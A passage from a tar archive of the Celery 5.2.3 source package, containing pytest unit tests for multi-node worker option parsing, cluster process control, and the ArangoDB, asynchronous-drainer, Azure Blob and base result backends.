bugreport(self.app) ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7717562 celery-5.2.3/t/unit/apps/0000775000175000017500000000000000000000000015062 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 
celery-5.2.3/t/unit/apps/__init__.py0000664000175000017500000000000000000000000017161 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/apps/test_multi.py0000664000175000017500000003757500000000000017646 0ustar00asifasif00000000000000import errno import os import signal import sys from unittest.mock import Mock, call, patch import pytest import t.skip from celery.apps.multi import (Cluster, MultiParser, NamespacedOptionParser, Node, format_opt) class test_functions: def test_parse_ns_range(self): m = MultiParser() assert m._parse_ns_range('1-3', True), ['1', '2' == '3'] assert m._parse_ns_range('1-3', False) == ['1-3'] assert m._parse_ns_range('1-3,10,11,20', True) == [ '1', '2', '3', '10', '11', '20', ] def test_format_opt(self): assert format_opt('--foo', None) == '--foo' assert format_opt('-c', 1) == '-c 1' assert format_opt('--log', 'foo') == '--log=foo' class test_NamespacedOptionParser: def test_parse(self): x = NamespacedOptionParser(['-c:1,3', '4']) x.parse() assert x.namespaces.get('1,3') == {'-c': '4'} x = NamespacedOptionParser(['-c:jerry,elaine', '5', '--loglevel:kramer=DEBUG', '--flag', '--logfile=foo', '-Q', 'bar', 'a', 'b', '--', '.disable_rate_limits=1']) x.parse() assert x.options == { '--logfile': 'foo', '-Q': 'bar', '--flag': None, } assert x.values, ['a' == 'b'] assert x.namespaces.get('jerry,elaine') == {'-c': '5'} assert x.namespaces.get('kramer') == {'--loglevel': 'DEBUG'} assert x.passthrough == '-- .disable_rate_limits=1' def multi_args(p, *args, **kwargs): return MultiParser(*args, **kwargs).parse(p) class test_multi_args: @patch('celery.apps.multi.os.mkdir') @patch('celery.apps.multi.gethostname') def test_parse(self, gethostname, mkdirs_mock): gethostname.return_value = 'example.com' p = NamespacedOptionParser([ '-c:jerry,elaine', '5', '--loglevel:kramer=DEBUG', '--flag', '--logfile=/var/log/celery/foo', '-Q', 'bar', 'jerry', 'elaine', 'kramer', '--', '.disable_rate_limits=1', ]) p.parse() it = multi_args(p, cmd='celery multi', append='*AP*', prefix='*P*', suffix='*S*') nodes = list(it) def assert_line_in(name, args): assert name in {n.name for n in nodes} argv = None for node in nodes: if node.name == name: argv = node.argv assert argv for arg in args: assert arg in argv assert_line_in( '*P*jerry@*S*', ['celery multi', '-n *P*jerry@*S*', '-Q bar', '-c 5', '--flag', '--logfile=/var/log/celery/foo', '-- .disable_rate_limits=1', '*AP*'], ) assert_line_in( '*P*elaine@*S*', ['celery multi', '-n *P*elaine@*S*', '-Q bar', '-c 5', '--flag', '--logfile=/var/log/celery/foo', '-- .disable_rate_limits=1', '*AP*'], ) assert_line_in( '*P*kramer@*S*', ['celery multi', '--loglevel=DEBUG', '-n *P*kramer@*S*', '-Q bar', '--flag', '--logfile=/var/log/celery/foo', '-- .disable_rate_limits=1', '*AP*'], ) expand = nodes[0].expander assert expand('%h') == '*P*jerry@*S*' assert expand('%n') == '*P*jerry' nodes2 = list(multi_args(p, cmd='celery multi', append='', prefix='*P*', suffix='*S*')) assert nodes2[0].argv[-1] == '-- .disable_rate_limits=1' p2 = NamespacedOptionParser(['10', '-c:1', '5']) p2.parse() nodes3 = list(multi_args(p2, cmd='celery multi')) def _args(name, *args): return args + ( '--pidfile={}.pid'.format(os.path.join(os.path.normpath('/var/run/celery/'), name)), '--logfile={}%I.log'.format(os.path.join(os.path.normpath('/var/log/celery/'), name)), f'--executable={sys.executable}', '', ) assert len(nodes3) == 10 assert nodes3[0].name == 'celery1@example.com' assert 
nodes3[0].argv == ( 'celery multi', '-c 5', '-n celery1@example.com') + _args('celery1') for i, worker in enumerate(nodes3[1:]): assert worker.name == 'celery%s@example.com' % (i + 2) node_i = f'celery{i + 2}' assert worker.argv == ( 'celery multi', f'-n {node_i}@example.com') + _args(node_i) nodes4 = list(multi_args(p2, cmd='celery multi', suffix='""')) assert len(nodes4) == 10 assert nodes4[0].name == 'celery1@' assert nodes4[0].argv == ( 'celery multi', '-c 5', '-n celery1@') + _args('celery1') p3 = NamespacedOptionParser(['foo@', '-c:foo', '5']) p3.parse() nodes5 = list(multi_args(p3, cmd='celery multi', suffix='""')) assert nodes5[0].name == 'foo@' assert nodes5[0].argv == ( 'celery multi', '-c 5', '-n foo@') + _args('foo') p4 = NamespacedOptionParser(['foo', '-Q:1', 'test']) p4.parse() nodes6 = list(multi_args(p4, cmd='celery multi', suffix='""')) assert nodes6[0].name == 'foo@' assert nodes6[0].argv == ( 'celery multi', '-Q test', '-n foo@') + _args('foo') p5 = NamespacedOptionParser(['foo@bar', '-Q:1', 'test']) p5.parse() nodes7 = list(multi_args(p5, cmd='celery multi', suffix='""')) assert nodes7[0].name == 'foo@bar' assert nodes7[0].argv == ( 'celery multi', '-Q test', '-n foo@bar') + _args('foo') p6 = NamespacedOptionParser(['foo@bar', '-Q:0', 'test']) p6.parse() with pytest.raises(KeyError): list(multi_args(p6)) def test_optmerge(self): p = NamespacedOptionParser(['foo', 'test']) p.parse() p.options = {'x': 'y'} r = p.optmerge('foo') assert r['x'] == 'y' class test_Node: def setup(self): self.p = Mock(name='p') self.p.options = { '--executable': 'python', '--logfile': '/var/log/celery/foo.log', } self.p.namespaces = {} with patch('celery.apps.multi.os.mkdir'): self.node = Node('foo@bar.com', options={'-A': 'proj'}) self.expander = self.node.expander = Mock(name='expander') self.node.pid = 303 def test_from_kwargs(self): with patch('celery.apps.multi.os.mkdir'): n = Node.from_kwargs( 'foo@bar.com', max_tasks_per_child=30, A='foo', Q='q1,q2', O='fair', ) assert sorted(n.argv) == sorted([ '-m celery -A foo worker --detach', f'--executable={n.executable}', '-O fair', '-n foo@bar.com', '--logfile={}'.format(os.path.normpath('/var/log/celery/foo%I.log')), '-Q q1,q2', '--max-tasks-per-child=30', '--pidfile={}'.format(os.path.normpath('/var/run/celery/foo.pid')), '', ]) @patch('os.kill') def test_send(self, kill): assert self.node.send(9) kill.assert_called_with(self.node.pid, 9) @patch('os.kill') def test_send__ESRCH(self, kill): kill.side_effect = OSError() kill.side_effect.errno = errno.ESRCH assert not self.node.send(9) kill.assert_called_with(self.node.pid, 9) @patch('os.kill') def test_send__error(self, kill): kill.side_effect = OSError() kill.side_effect.errno = errno.ENOENT with pytest.raises(OSError): self.node.send(9) kill.assert_called_with(self.node.pid, 9) def test_alive(self): self.node.send = Mock(name='send') assert self.node.alive() is self.node.send.return_value self.node.send.assert_called_with(0) def test_start(self): self.node._waitexec = Mock(name='_waitexec') self.node.start(env={'foo': 'bar'}, kw=2) self.node._waitexec.assert_called_with( self.node.argv, path=self.node.executable, env={'foo': 'bar'}, kw=2, ) @patch('celery.apps.multi.Popen') def test_waitexec(self, Popen, argv=['A', 'B']): on_spawn = Mock(name='on_spawn') on_signalled = Mock(name='on_signalled') on_failure = Mock(name='on_failure') env = Mock(name='env') self.node.handle_process_exit = Mock(name='handle_process_exit') self.node._waitexec( argv, path='python', env=env, on_spawn=on_spawn, 
on_signalled=on_signalled, on_failure=on_failure, ) Popen.assert_called_with( self.node.prepare_argv(argv, 'python'), env=env) self.node.handle_process_exit.assert_called_with( Popen().wait(), on_signalled=on_signalled, on_failure=on_failure, ) def test_handle_process_exit(self): assert self.node.handle_process_exit(0) == 0 def test_handle_process_exit__failure(self): on_failure = Mock(name='on_failure') assert self.node.handle_process_exit(9, on_failure=on_failure) == 9 on_failure.assert_called_with(self.node, 9) def test_handle_process_exit__signalled(self): on_signalled = Mock(name='on_signalled') assert self.node.handle_process_exit( -9, on_signalled=on_signalled) == 9 on_signalled.assert_called_with(self.node, 9) def test_logfile(self): assert self.node.logfile == self.expander.return_value self.expander.assert_called_with(os.path.normpath('/var/log/celery/%n%I.log')) @patch('celery.apps.multi.os.path.exists') def test_pidfile_default(self, mock_exists): n = Node.from_kwargs( 'foo@bar.com', ) assert n.options['--pidfile'] == os.path.normpath('/var/run/celery/%n.pid') mock_exists.assert_any_call(os.path.normpath('/var/run/celery')) @patch('celery.apps.multi.os.makedirs') @patch('celery.apps.multi.os.path.exists', return_value=False) def test_pidfile_custom(self, mock_exists, mock_dirs): n = Node.from_kwargs( 'foo@bar.com', pidfile='/var/run/demo/celery/%n.pid' ) assert n.options['--pidfile'] == '/var/run/demo/celery/%n.pid' try: mock_exists.assert_any_call('/var/run/celery') except AssertionError: pass else: raise AssertionError("Expected exists('/var/run/celery') to not have been called.") mock_exists.assert_any_call('/var/run/demo/celery') mock_dirs.assert_any_call('/var/run/demo/celery') class test_Cluster: def setup(self): self.Popen = self.patching('celery.apps.multi.Popen') self.kill = self.patching('os.kill') self.gethostname = self.patching('celery.apps.multi.gethostname') self.gethostname.return_value = 'example.com' self.Pidfile = self.patching('celery.apps.multi.Pidfile') with patch('celery.apps.multi.os.mkdir'): self.cluster = Cluster( [Node('foo@example.com'), Node('bar@example.com'), Node('baz@example.com')], on_stopping_preamble=Mock(name='on_stopping_preamble'), on_send_signal=Mock(name='on_send_signal'), on_still_waiting_for=Mock(name='on_still_waiting_for'), on_still_waiting_progress=Mock(name='on_still_waiting_progress'), on_still_waiting_end=Mock(name='on_still_waiting_end'), on_node_start=Mock(name='on_node_start'), on_node_restart=Mock(name='on_node_restart'), on_node_shutdown_ok=Mock(name='on_node_shutdown_ok'), on_node_status=Mock(name='on_node_status'), on_node_signal=Mock(name='on_node_signal'), on_node_signal_dead=Mock(name='on_node_signal_dead'), on_node_down=Mock(name='on_node_down'), on_child_spawn=Mock(name='on_child_spawn'), on_child_signalled=Mock(name='on_child_signalled'), on_child_failure=Mock(name='on_child_failure'), ) def test_len(self): assert len(self.cluster) == 3 def test_getitem(self): assert self.cluster[0].name == 'foo@example.com' def test_start(self): self.cluster.start_node = Mock(name='start_node') self.cluster.start() self.cluster.start_node.assert_has_calls( call(node) for node in self.cluster ) def test_start_node(self): self.cluster._start_node = Mock(name='_start_node') node = self.cluster[0] assert (self.cluster.start_node(node) is self.cluster._start_node.return_value) self.cluster.on_node_start.assert_called_with(node) self.cluster._start_node.assert_called_with(node) self.cluster.on_node_status.assert_called_with( node, 
self.cluster._start_node(), ) def test__start_node(self): node = self.cluster[0] node.start = Mock(name='node.start') assert self.cluster._start_node(node) is node.start.return_value node.start.assert_called_with( self.cluster.env, on_spawn=self.cluster.on_child_spawn, on_signalled=self.cluster.on_child_signalled, on_failure=self.cluster.on_child_failure, ) def test_send_all(self): nodes = [Mock(name='n1'), Mock(name='n2')] self.cluster.getpids = Mock(name='getpids') self.cluster.getpids.return_value = nodes self.cluster.send_all(15) self.cluster.on_node_signal.assert_has_calls( call(node, 'TERM') for node in nodes ) for node in nodes: node.send.assert_called_with(15, self.cluster.on_node_signal_dead) @t.skip.if_win32 def test_kill(self): self.cluster.send_all = Mock(name='.send_all') self.cluster.kill() self.cluster.send_all.assert_called_with(signal.SIGKILL) def test_getpids(self): self.gethostname.return_value = 'e.com' self.prepare_pidfile_for_getpids(self.Pidfile) callback = Mock() with patch('celery.apps.multi.os.mkdir'): p = Cluster([ Node('foo@e.com'), Node('bar@e.com'), Node('baz@e.com'), ]) nodes = p.getpids(on_down=callback) node_0, node_1 = nodes assert node_0.name == 'foo@e.com' assert sorted(node_0.argv) == sorted([ '', f'--executable={node_0.executable}', '--logfile={}'.format(os.path.normpath('/var/log/celery/foo%I.log')), '--pidfile={}'.format(os.path.normpath('/var/run/celery/foo.pid')), '-m celery worker --detach', '-n foo@e.com', ]) assert node_0.pid == 10 assert node_1.name == 'bar@e.com' assert sorted(node_1.argv) == sorted([ '', f'--executable={node_1.executable}', '--logfile={}'.format(os.path.normpath('/var/log/celery/bar%I.log')), '--pidfile={}'.format(os.path.normpath('/var/run/celery/bar.pid')), '-m celery worker --detach', '-n bar@e.com', ]) assert node_1.pid == 11 # without callback, should work nodes = p.getpids('celery worker') def prepare_pidfile_for_getpids(self, Pidfile): class pids: def __init__(self, path): self.path = path def read_pid(self): try: return {os.path.normpath('/var/run/celery/foo.pid'): 10, os.path.normpath('/var/run/celery/bar.pid'): 11}[self.path] except KeyError: raise ValueError() self.Pidfile.side_effect = pids ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7957566 celery-5.2.3/t/unit/backends/0000775000175000017500000000000000000000000015671 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/__init__.py0000664000175000017500000000000000000000000017770 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_arangodb.py0000664000175000017500000001040300000000000021055 0ustar00asifasif00000000000000"""Tests for the ArangoDb.""" import datetime from unittest.mock import Mock, patch, sentinel import pytest from celery.app import backends from celery.backends import arangodb as module from celery.backends.arangodb import ArangoDbBackend from celery.exceptions import ImproperlyConfigured try: import pyArango except ImportError: pyArango = None pytest.importorskip('pyArango') class test_ArangoDbBackend: def setup(self): self.backend = ArangoDbBackend(app=self.app) def test_init_no_arangodb(self): prev, module.py_arango_connection = module.py_arango_connection, None try: with pytest.raises(ImproperlyConfigured): ArangoDbBackend(app=self.app) finally: 
module.py_arango_connection = prev def test_init_no_settings(self): self.app.conf.arangodb_backend_settings = [] with pytest.raises(ImproperlyConfigured): ArangoDbBackend(app=self.app) def test_init_settings_is_None(self): self.app.conf.arangodb_backend_settings = None ArangoDbBackend(app=self.app) def test_get_connection_connection_exists(self): with patch('pyArango.connection.Connection') as mock_Connection: self.backend._connection = sentinel._connection connection = self.backend._connection assert sentinel._connection == connection mock_Connection.assert_not_called() def test_get(self): self.app.conf.arangodb_backend_settings = {} x = ArangoDbBackend(app=self.app) x.get = Mock() x.get.return_value = sentinel.retval assert x.get('1f3fab') == sentinel.retval x.get.assert_called_once_with('1f3fab') def test_delete(self): self.app.conf.arangodb_backend_settings = {} x = ArangoDbBackend(app=self.app) x.delete = Mock() x.delete.return_value = None assert x.delete('1f3fab') is None def test_config_params(self): self.app.conf.arangodb_backend_settings = { 'host': 'test.arangodb.com', 'port': '8529', 'username': 'johndoe', 'password': 'mysecret', 'database': 'celery_database', 'collection': 'celery_collection', 'http_protocol': 'https', 'verify': True } x = ArangoDbBackend(app=self.app) assert x.host == 'test.arangodb.com' assert x.port == 8529 assert x.username == 'johndoe' assert x.password == 'mysecret' assert x.database == 'celery_database' assert x.collection == 'celery_collection' assert x.http_protocol == 'https' assert x.arangodb_url == 'https://test.arangodb.com:8529' assert x.verify is True def test_backend_by_url( self, url="arangodb://username:password@host:port/database/collection" ): from celery.backends.arangodb import ArangoDbBackend backend, url_ = backends.by_url(url, self.app.loader) assert backend is ArangoDbBackend assert url_ == url def test_backend_params_by_url(self): url = ( "arangodb://johndoe:mysecret@test.arangodb.com:8529/" "celery_database/celery_collection" ) with self.Celery(backend=url) as app: x = app.backend assert x.host == 'test.arangodb.com' assert x.port == 8529 assert x.username == 'johndoe' assert x.password == 'mysecret' assert x.database == 'celery_database' assert x.collection == 'celery_collection' assert x.http_protocol == 'http' assert x.arangodb_url == 'http://test.arangodb.com:8529' assert x.verify is False def test_backend_cleanup(self): now = datetime.datetime.utcnow() self.backend.app.now = Mock(return_value=now) self.backend._connection = { 'celery': Mock(), } self.backend.cleanup() expected_date = (now - self.backend.expires_delta).isoformat() expected_query = ( 'FOR item IN celery ' 'FILTER item.task.date_done < "{date}" ' 'REMOVE item IN celery' ).format(date=expected_date) self.backend.db.AQLQuery.assert_called_once_with(expected_query) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/backends/test_asynchronous.py0000664000175000017500000001533200000000000022041 0ustar00asifasif00000000000000import os import socket import sys import threading import time from unittest.mock import Mock, patch import pytest from vine import promise from celery.backends.asynchronous import BaseResultConsumer from celery.backends.base import Backend from celery.utils import cached_property pytest.importorskip('gevent') pytest.importorskip('eventlet') @pytest.fixture(autouse=True) def setup_eventlet(): # By default eventlet will patch the DNS resolver when imported. 
os.environ.update(EVENTLET_NO_GREENDNS='yes') class DrainerTests: """ Base test class for the Default / Gevent / Eventlet drainers. """ interval = 0.1 # Check every tenth of a second MAX_TIMEOUT = 10 # Specify a max timeout so it doesn't run forever def get_drainer(self, environment): with patch('celery.backends.asynchronous.detect_environment') as d: d.return_value = environment backend = Backend(self.app) consumer = BaseResultConsumer(backend, self.app, backend.accept, pending_results={}, pending_messages={}) consumer.drain_events = Mock(side_effect=self.result_consumer_drain_events) return consumer.drainer @pytest.fixture(autouse=True) def setup_drainer(self): raise NotImplementedError @cached_property def sleep(self): """ Sleep on the event loop. """ raise NotImplementedError def schedule_thread(self, thread): """ Set up a thread that runs on the event loop. """ raise NotImplementedError def teardown_thread(self, thread): """ Wait for a thread to stop. """ raise NotImplementedError def result_consumer_drain_events(self, timeout=None): """ Subclasses should override this method to define the behavior of drainer.result_consumer.drain_events. """ raise NotImplementedError def test_drain_checks_on_interval(self): p = promise() def fulfill_promise_thread(): self.sleep(self.interval * 2) p('done') fulfill_thread = self.schedule_thread(fulfill_promise_thread) on_interval = Mock() for _ in self.drainer.drain_events_until(p, on_interval=on_interval, interval=self.interval, timeout=self.MAX_TIMEOUT): pass self.teardown_thread(fulfill_thread) assert p.ready, 'Should have terminated with promise being ready' assert on_interval.call_count < 20, 'Should have limited number of calls to on_interval' def test_drain_does_not_block_event_loop(self): """ This test makes sure that other greenlets can still operate while drain_events_until is running. 
""" p = promise() liveness_mock = Mock() def fulfill_promise_thread(): self.sleep(self.interval * 2) p('done') def liveness_thread(): while 1: if p.ready: return self.sleep(self.interval / 10) liveness_mock() fulfill_thread = self.schedule_thread(fulfill_promise_thread) liveness_thread = self.schedule_thread(liveness_thread) on_interval = Mock() for _ in self.drainer.drain_events_until(p, on_interval=on_interval, interval=self.interval, timeout=self.MAX_TIMEOUT): pass self.teardown_thread(fulfill_thread) self.teardown_thread(liveness_thread) assert p.ready, 'Should have terminated with promise being ready' assert on_interval.call_count <= liveness_mock.call_count, \ 'Should have served liveness_mock while waiting for event' def test_drain_timeout(self): p = promise() on_interval = Mock() with pytest.raises(socket.timeout): for _ in self.drainer.drain_events_until(p, on_interval=on_interval, interval=self.interval, timeout=self.interval * 5): pass assert not p.ready, 'Promise should remain un-fulfilled' assert on_interval.call_count < 20, 'Should have limited number of calls to on_interval' @pytest.mark.skipif( sys.platform == "win32", reason="hangs forever intermittently on windows" ) class test_EventletDrainer(DrainerTests): @pytest.fixture(autouse=True) def setup_drainer(self): self.drainer = self.get_drainer('eventlet') @cached_property def sleep(self): from eventlet import sleep return sleep def result_consumer_drain_events(self, timeout=None): import eventlet # `drain_events` of asynchronous backends with pubsub have to sleep # while waiting events for not more then `interval` timeout, # but events may coming sooner eventlet.sleep(timeout/10) def schedule_thread(self, thread): import eventlet g = eventlet.spawn(thread) eventlet.sleep(0) return g def teardown_thread(self, thread): thread.wait() class test_Drainer(DrainerTests): @pytest.fixture(autouse=True) def setup_drainer(self): self.drainer = self.get_drainer('default') @cached_property def sleep(self): from time import sleep return sleep def result_consumer_drain_events(self, timeout=None): time.sleep(timeout) def schedule_thread(self, thread): t = threading.Thread(target=thread) t.start() return t def teardown_thread(self, thread): thread.join() class test_GeventDrainer(DrainerTests): @pytest.fixture(autouse=True) def setup_drainer(self): self.drainer = self.get_drainer('gevent') @cached_property def sleep(self): from gevent import sleep return sleep def result_consumer_drain_events(self, timeout=None): import gevent # `drain_events` of asynchronous backends with pubsub have to sleep # while waiting events for not more then `interval` timeout, # but events may coming sooner gevent.sleep(timeout/10) def schedule_thread(self, thread): import gevent g = gevent.spawn(thread) gevent.sleep(0) return g def teardown_thread(self, thread): import gevent gevent.wait([thread]) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_azureblockblob.py0000664000175000017500000001517400000000000022312 0ustar00asifasif00000000000000from unittest.mock import Mock, call, patch import pytest from celery import states from celery.backends import azureblockblob from celery.backends.azureblockblob import AzureBlockBlobBackend from celery.exceptions import ImproperlyConfigured MODULE_TO_MOCK = "celery.backends.azureblockblob" pytest.importorskip('azure.storage.blob') pytest.importorskip('azure.core.exceptions') class test_AzureBlockBlobBackend: def setup(self): 
self.url = ( "azureblockblob://" "DefaultEndpointsProtocol=protocol;" "AccountName=name;" "AccountKey=key;" "EndpointSuffix=suffix") self.backend = AzureBlockBlobBackend( app=self.app, url=self.url) @pytest.fixture(params=['', 'my_folder/']) def base_path(self, request): return request.param def test_missing_third_party_sdk(self): azurestorage = azureblockblob.azurestorage try: azureblockblob.azurestorage = None with pytest.raises(ImproperlyConfigured): AzureBlockBlobBackend(app=self.app, url=self.url) finally: azureblockblob.azurestorage = azurestorage def test_bad_connection_url(self): with pytest.raises(ImproperlyConfigured): AzureBlockBlobBackend._parse_url("azureblockblob://") with pytest.raises(ImproperlyConfigured): AzureBlockBlobBackend._parse_url("") @patch(MODULE_TO_MOCK + ".BlobServiceClient") def test_create_client(self, mock_blob_service_factory): mock_blob_service_client_instance = Mock() mock_blob_service_factory.from_connection_string.return_value = mock_blob_service_client_instance backend = AzureBlockBlobBackend(app=self.app, url=self.url) # ensure container gets created on client access... assert mock_blob_service_client_instance.create_container.call_count == 0 assert backend._blob_service_client is not None assert mock_blob_service_client_instance.create_container.call_count == 1 # ...but only once per backend instance assert backend._blob_service_client is not None assert mock_blob_service_client_instance.create_container.call_count == 1 @patch(MODULE_TO_MOCK + ".BlobServiceClient") def test_configure_client(self, mock_blob_service_factory): connection_timeout = 3 read_timeout = 11 self.app.conf.update( { 'azureblockblob_connection_timeout': connection_timeout, 'azureblockblob_read_timeout': read_timeout, } ) mock_blob_service_client_instance = Mock() mock_blob_service_factory.from_connection_string.return_value = ( mock_blob_service_client_instance ) base_url = "azureblockblob://" connection_string = "connection_string" backend = AzureBlockBlobBackend( app=self.app, url=f'{base_url}{connection_string}' ) client = backend._blob_service_client assert client is mock_blob_service_client_instance ( mock_blob_service_factory .from_connection_string .assert_called_once_with( connection_string, connection_timeout=connection_timeout, read_timeout=read_timeout ) ) @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client") def test_get(self, mock_client, base_path): self.backend.base_path = base_path self.backend.get(b"mykey") mock_client.get_blob_client \ .assert_called_once_with(blob=base_path + "mykey", container="celery") mock_client.get_blob_client.return_value \ .download_blob.return_value \ .readall.return_value \ .decode.assert_called_once() @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client") def test_get_missing(self, mock_client): mock_client.get_blob_client.return_value \ .download_blob.return_value \ .readall.side_effect = azureblockblob.ResourceNotFoundError assert self.backend.get(b"mykey") is None @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client") def test_set(self, mock_client, base_path): self.backend.base_path = base_path self.backend._set_with_state(b"mykey", "myvalue", states.SUCCESS) mock_client.get_blob_client.assert_called_once_with( container="celery", blob=base_path + "mykey") mock_client.get_blob_client.return_value \ .upload_blob.assert_called_once_with("myvalue", overwrite=True) @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client") def test_mget(self, mock_client, base_path): keys = 
[b"mykey1", b"mykey2"] self.backend.base_path = base_path self.backend.mget(keys) mock_client.get_blob_client.assert_has_calls( [call(blob=base_path + key.decode(), container='celery') for key in keys], any_order=True,) @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client") def test_delete(self, mock_client, base_path): self.backend.base_path = base_path self.backend.delete(b"mykey") mock_client.get_blob_client.assert_called_once_with( container="celery", blob=base_path + "mykey") mock_client.get_blob_client.return_value \ .delete_blob.assert_called_once() def test_base_path_conf(self, base_path): self.app.conf.azureblockblob_base_path = base_path backend = AzureBlockBlobBackend( app=self.app, url=self.url ) assert backend.base_path == base_path def test_base_path_conf_default(self): backend = AzureBlockBlobBackend( app=self.app, url=self.url ) assert backend.base_path == '' class test_as_uri: def setup(self): self.url = ( "azureblockblob://" "DefaultEndpointsProtocol=protocol;" "AccountName=name;" "AccountKey=account_key;" "EndpointSuffix=suffix" ) self.backend = AzureBlockBlobBackend( app=self.app, url=self.url ) def test_as_uri_include_password(self): assert self.backend.as_uri(include_password=True) == self.url def test_as_uri_exclude_password(self): assert self.backend.as_uri(include_password=False) == ( "azureblockblob://" "DefaultEndpointsProtocol=protocol;" "AccountName=name;" "AccountKey=**;" "EndpointSuffix=suffix" ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/t/unit/backends/test_base.py0000664000175000017500000012516300000000000020224 0ustar00asifasif00000000000000import re from contextlib import contextmanager from unittest.mock import ANY, MagicMock, Mock, call, patch, sentinel import pytest from kombu.serialization import prepare_accept_content from kombu.utils.encoding import ensure_bytes import celery from celery import chord, group, signature, states, uuid from celery.app.task import Context, Task from celery.backends.base import (BaseBackend, DisabledBackend, KeyValueStoreBackend, _nulldict) from celery.exceptions import (BackendGetMetaError, BackendStoreError, ChordError, SecurityError, TimeoutError) from celery.result import result_from_tuple from celery.utils import serialization from celery.utils.functional import pass1 from celery.utils.serialization import UnpickleableExceptionWrapper from celery.utils.serialization import find_pickleable_exception as fnpe from celery.utils.serialization import get_pickleable_exception as gpe from celery.utils.serialization import subclass_exception class wrapobject: def __init__(self, *args, **kwargs): self.args = args class paramexception(Exception): def __init__(self, param): self.param = param class objectexception: class Nested(Exception): pass Oldstyle = None Unpickleable = subclass_exception( 'Unpickleable', KeyError, 'foo.module', ) Impossible = subclass_exception( 'Impossible', object, 'foo.module', ) Lookalike = subclass_exception( 'Lookalike', wrapobject, 'foo.module', ) class test_nulldict: def test_nulldict(self): x = _nulldict() x['foo'] = 1 x.update(foo=1, bar=2) x.setdefault('foo', 3) class test_serialization: def test_create_exception_cls(self): assert serialization.create_exception_cls('FooError', 'm') assert serialization.create_exception_cls('FooError', 'm', KeyError) class test_Backend_interface: def setup(self): self.app.conf.accept_content = ['json'] def test_accept_precedence(self): # default is 
app.conf.accept_content accept_content = self.app.conf.accept_content b1 = BaseBackend(self.app) assert prepare_accept_content(accept_content) == b1.accept # accept parameter b2 = BaseBackend(self.app, accept=['yaml']) assert len(b2.accept) == 1 assert list(b2.accept)[0] == 'application/x-yaml' assert prepare_accept_content(['yaml']) == b2.accept # accept parameter over result_accept_content self.app.conf.result_accept_content = ['json'] b3 = BaseBackend(self.app, accept=['yaml']) assert len(b3.accept) == 1 assert list(b3.accept)[0] == 'application/x-yaml' assert prepare_accept_content(['yaml']) == b3.accept # conf.result_accept_content if specified self.app.conf.result_accept_content = ['yaml'] b4 = BaseBackend(self.app) assert len(b4.accept) == 1 assert list(b4.accept)[0] == 'application/x-yaml' assert prepare_accept_content(['yaml']) == b4.accept def test_get_result_meta(self): b1 = BaseBackend(self.app) meta = b1._get_result_meta(result={'fizz': 'buzz'}, state=states.SUCCESS, traceback=None, request=None) assert meta['status'] == states.SUCCESS assert meta['result'] == {'fizz': 'buzz'} assert meta['traceback'] is None self.app.conf.result_extended = True args = ['a', 'b'] kwargs = {'foo': 'bar'} task_name = 'mytask' b2 = BaseBackend(self.app) request = Context(args=args, kwargs=kwargs, task=task_name, delivery_info={'routing_key': 'celery'}) meta = b2._get_result_meta(result={'fizz': 'buzz'}, state=states.SUCCESS, traceback=None, request=request, encode=False) assert meta['name'] == task_name assert meta['args'] == args assert meta['kwargs'] == kwargs assert meta['queue'] == 'celery' def test_get_result_meta_encoded(self): self.app.conf.result_extended = True b1 = BaseBackend(self.app) args = ['a', 'b'] kwargs = {'foo': 'bar'} request = Context(args=args, kwargs=kwargs) meta = b1._get_result_meta(result={'fizz': 'buzz'}, state=states.SUCCESS, traceback=None, request=request, encode=True) assert meta['args'] == ensure_bytes(b1.encode(args)) assert meta['kwargs'] == ensure_bytes(b1.encode(kwargs)) def test_get_result_meta_with_none(self): b1 = BaseBackend(self.app) meta = b1._get_result_meta(result=None, state=states.SUCCESS, traceback=None, request=None) assert meta['status'] == states.SUCCESS assert meta['result'] is None assert meta['traceback'] is None self.app.conf.result_extended = True args = ['a', 'b'] kwargs = {'foo': 'bar'} task_name = 'mytask' b2 = BaseBackend(self.app) request = Context(args=args, kwargs=kwargs, task=task_name, delivery_info={'routing_key': 'celery'}) meta = b2._get_result_meta(result=None, state=states.SUCCESS, traceback=None, request=request, encode=False) assert meta['name'] == task_name assert meta['args'] == args assert meta['kwargs'] == kwargs assert meta['queue'] == 'celery' class test_BaseBackend_interface: def setup(self): self.b = BaseBackend(self.app) @self.app.task(shared=False) def callback(result): pass self.callback = callback def test__forget(self): with pytest.raises(NotImplementedError): self.b._forget('SOMExx-N0Nex1stant-IDxx-') def test_forget(self): with pytest.raises(NotImplementedError): self.b.forget('SOMExx-N0nex1stant-IDxx-') def test_on_chord_part_return(self): self.b.on_chord_part_return(None, None, None) def test_apply_chord(self, unlock='celery.chord_unlock'): self.app.tasks[unlock] = Mock() header_result_args = ( uuid(), [self.app.AsyncResult(x) for x in range(3)], ) self.b.apply_chord(header_result_args, self.callback.s()) assert self.app.tasks[unlock].apply_async.call_count def test_chord_unlock_queue(self, 
